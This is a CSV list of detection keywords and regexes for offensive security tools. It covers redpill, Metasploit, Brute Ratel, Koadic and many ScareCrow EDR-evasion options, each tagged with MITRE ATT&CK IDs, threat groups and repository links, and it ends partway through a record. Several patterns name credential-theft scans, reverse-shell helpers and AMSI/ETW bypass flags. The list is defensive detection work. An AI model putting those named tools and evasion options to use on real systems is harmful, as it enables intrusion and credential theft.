"*ScanInterception_x64.ps1*",".{0,1000}ScanInterception_x64\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" 
"*scanless*",".{0,1000}scanless.{0,1000}","offensive_tool_keyword","scanless","This is a Python 3 command-line utility and library for using websites that can perform port scans on your behalf","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0008","N/A","N/A","Information Gathering","https://github.com/vesche/scanless","1","0","N/A","N/A","10","1100","169","2023-08-07T15:12:42Z","2017-05-05T02:53:01Z" "*scanner/backdoor*",".{0,1000}scanner\/backdoor.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*scannerport.go -*",".{0,1000}scannerport\.go\s\-.{0,1000}","offensive_tool_keyword","GONET-Scanner","port scanner and arp discover in go","T1595","TA0001","N/A","N/A","Network Exploitation tools","https://github.com/luijait/GONET-Scanner","1","0","N/A","N/A","1","79","20","2022-03-10T04:35:58Z","2022-02-02T19:39:09Z" "*Scanners-Box*",".{0,1000}Scanners\-Box.{0,1000}","offensive_tool_keyword","Scanners-Box","Scanners Box also known as scanbox. is a powerful hacker toolkit. 
which has collected more than 10 categories of open source scanners from Github. including subdomain. database. middleware and other modular design scanner etc. But for other Well-known scanning tools. such as nmap. w3af. brakeman. arachni. nikto. metasploit. aircrack-ng will not be included in the scope of collection.","T1190 - T1210.001 - T1595 - T1192","TA0007 - TA0002 - TA0008 - ","N/A","N/A","Exploitation tools","https://github.com/We5ter/Scanners-Box","1","0","N/A","N/A","10","7986","2348","2024-04-19T05:43:34Z","2016-12-24T16:07:50Z" "*Scanning ConsoleHost_History for creds*",".{0,1000}Scanning\sConsoleHost_History\sfor\screds.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","script content","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*Scanning credential store for creds!*",".{0,1000}Scanning\scredential\sstore\sfor\screds!.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation 
tools","https://github.com/r00t-3xp10it/redpill","1","0","script content","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*Scanning for Sandboxie?*",".{0,1000}Scanning\sfor\sSandboxie\?.{0,1000}","offensive_tool_keyword","hXOR-Packer","hXOR Packer is a PE (Portable Executable) packer with Huffman Compression and Xor encryption.","T1027 - T1048.003 - T1140 - T1205.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/akuafif/hXOR-Packer","1","0","N/A","9","1","50","13","2021-09-11T13:00:34Z","2020-11-19T14:57:03Z" "*Scanning registry for winlogon creds*",".{0,1000}Scanning\sregistry\sfor\swinlogon\screds.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","script content","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*Scanning Teamviewer for creds!*",".{0,1000}Scanning\sTeamviewer\sfor\screds!.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation 
tools","https://github.com/r00t-3xp10it/redpill","1","0","script content","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*Scanning winlogon for crypted creds!*",".{0,1000}Scanning\swinlogon\sfor\scrypted\screds!.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","script content","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*ScanProcessForBadgerConfig*",".{0,1000}ScanProcessForBadgerConfig.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*ScanTCPImplant*",".{0,1000}ScanTCPImplant.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*ScareCrow *-loader *",".{0,1000}ScareCrow\s.{0,1000}\-loader\s.{0,1000}","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","0","N/A","N/A","10","2662","492","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" "*ScareCrow* -encryptionmode *",".{0,1000}ScareCrow.{0,1000}\s\-encryptionmode\s.{0,1000}","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - 
LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","0","N/A","10","10","2662","492","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" "*ScareCrow* -Evasion*",".{0,1000}ScareCrow.{0,1000}\s\-Evasion.{0,1000}","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","0","N/A","10","10","2662","492","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" "*ScareCrow* -Exec*",".{0,1000}ScareCrow.{0,1000}\s\-Exec.{0,1000}","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 
- T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","0","N/A","10","10","2662","492","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" "*ScareCrow* -injection*",".{0,1000}ScareCrow.{0,1000}\s\-injection.{0,1000}","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/optiv/ScareCrow","1","0","N/A","10","10","2662","492","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" "*ScareCrow* -Loader * ",".{0,1000}ScareCrow.{0,1000}\s\-Loader\s.{0,1000}\s","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","0","N/A","10","10","2662","492","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" "*ScareCrow* -noamsi*",".{0,1000}ScareCrow.{0,1000}\s\-noamsi.{0,1000}","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 
- T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","0","N/A","10","10","2662","492","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" "*ScareCrow* -noetw*",".{0,1000}ScareCrow.{0,1000}\s\-noetw.{0,1000}","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","0","N/A","10","10","2662","492","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" 
"*ScareCrow* -obfu*",".{0,1000}ScareCrow.{0,1000}\s\-obfu.{0,1000}","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","0","N/A","10","10","2662","492","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" "*ScareCrow*_darwin_amd64*",".{0,1000}ScareCrow.{0,1000}_darwin_amd64.{0,1000}","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - 
T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","1","N/A","10","10","2662","492","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" "*ScareCrow*_windows_amd64.exe*",".{0,1000}ScareCrow.{0,1000}_windows_amd64\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","1","N/A","10","10","2662","492","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" 
"*ScareCrow*KnownDLL*",".{0,1000}ScareCrow.{0,1000}KnownDLL.{0,1000}","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","1","N/A","10","10","2662","492","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" "*ScareCrow*ProcessInjection*",".{0,1000}ScareCrow.{0,1000}ProcessInjection.{0,1000}","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - 
T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","1","N/A","10","10","2662","492","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" "*ScareCrow*windows_amd64.exe*",".{0,1000}ScareCrow.{0,1000}windows_amd64\.exe.{0,1000}","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","1","N/A","N/A","10","2662","492","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" "*ScareCrow.cna*",".{0,1000}ScareCrow\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike script for ScareCrow payloads intergration (EDR/AV evasion)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - 
Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GeorgePatsias/ScareCrow-CobaltStrike","1","1","N/A","10","10","446","69","2022-07-15T09:39:18Z","2021-06-24T10:04:01Z" "*ScareCrow.go*",".{0,1000}ScareCrow\.go.{0,1000}","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","1","N/A","N/A","10","2662","492","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" "*ScareCrow/Cryptor*",".{0,1000}ScareCrow\/Cryptor.{0,1000}","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 